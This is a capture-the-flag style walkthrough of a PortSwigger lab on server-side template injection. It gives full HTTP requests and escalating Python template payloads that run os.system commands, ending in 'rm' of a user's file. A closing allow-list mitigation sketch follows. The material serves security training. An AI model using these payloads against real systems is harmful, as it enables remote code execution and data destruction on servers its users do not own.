PortSwigger: Basic server-side template injection

Basic server-side template injection (code context)

Solution

Log in as user: wiener

POST /login HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=mrGP8bh2Eka7t1GzESouPmKGkUSq0qHD
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=0Hdk0bkrvWU1AYMwEeEgAKRWRIikDYW5&username=wiener&password=peter
---
GET /my-account?id=wiener HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Change "Preferred name"

POST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display=user.name&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIO

Send the first basic payload

Payload: {{4*4}}
---
POST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display={{4*4}}&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIO

Confirm that the payload works

Open the website and add a comment (I see {{16}})
https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/post?postId=4
---
GET /post?postId=4 HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /post/comment HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/post?postId=4
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIO&postId=4&comment=test
---
GET /post/comment/confirmation?postId=4 HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/post?postId=4
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Second payload

Payload: {{__import__('os').system('id')}}
---
POST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display={{__import__('os').system('id')}}&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIO

Third payload

Payload: {{__import__('os').system('ls /home/carlos/morale.txt')}}
---
POST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display={{__import__('os').system('ls /home/carlos/morale.txt')}}&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIO

Last payload - delete file morale.txt

Payload: {{__import__('os').system('rm /home/carlos/morale.txt')}}
---
POST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display={{__import__('os').system('rm /home/carlos/morale.txt')}}&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIO

Solved
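
Mitigation sketch, as an added example (not code from the lab or from PortSwigger): the blog-post-author-display parameter should be treated as a lookup key, never as template source. It assumes the server builds the author expression by string concatenation; the user record and every allow-list key other than user.name are constructed for illustration.

```python
from urllib.parse import parse_qs

# Constructed user record for illustration.
USER = {"name": "wiener", "first_name": "Peter", "nickname": "pw"}

# Allow-list of display options. Only "user.name" appears on the page;
# the other two keys are hypothetical choices added for this example.
DISPLAY_FIELDS = {
    "user.name": lambda u: u["name"],
    "user.first_name": lambda u: u["first_name"],
    "user.nickname": lambda u: u["nickname"],
}

# Two form bodies: the legitimate one and the arithmetic probe from the
# page, with the CSRF token shortened to a constructed placeholder.
SAMPLE_BODIES = [
    "blog-post-author-display=user.name&csrf=TOKEN",
    "blog-post-author-display={{4*4}}&csrf=TOKEN",
]

def vulnerable_template(display: str) -> str:
    """Anti-pattern (assumed server behaviour): input becomes template source."""
    return "{{" + display + "}}"

def safe_author(display: str, user: dict) -> str:
    """Hardened: the parameter only selects a field and is never evaluated."""
    try:
        return DISPLAY_FIELDS[display](user)
    except KeyError:
        raise ValueError("unsupported display option") from None

def check_body(body: str, user: dict) -> str:
    """Parse a urlencoded form body and resolve the author display safely."""
    values = parse_qs(body, keep_blank_values=True).get(
        "blog-post-author-display", [])
    if len(values) != 1:  # missing or duplicated parameter
        raise ValueError("expected exactly one blog-post-author-display")
    return safe_author(values[0], user)

def audit(bodies: list, user: dict) -> list:
    """Return (submitted value, accepted?) for each form body."""
    results = []
    for body in bodies:
        value = parse_qs(body)["blog-post-author-display"][0]
        try:
            check_body(body, user)
            results.append((value, True))
        except ValueError:
            results.append((value, False))
    return results
```

The same allow-list doubles as a detection point: any rejected value is worth logging, since a legitimate client only ever submits one of the known keys.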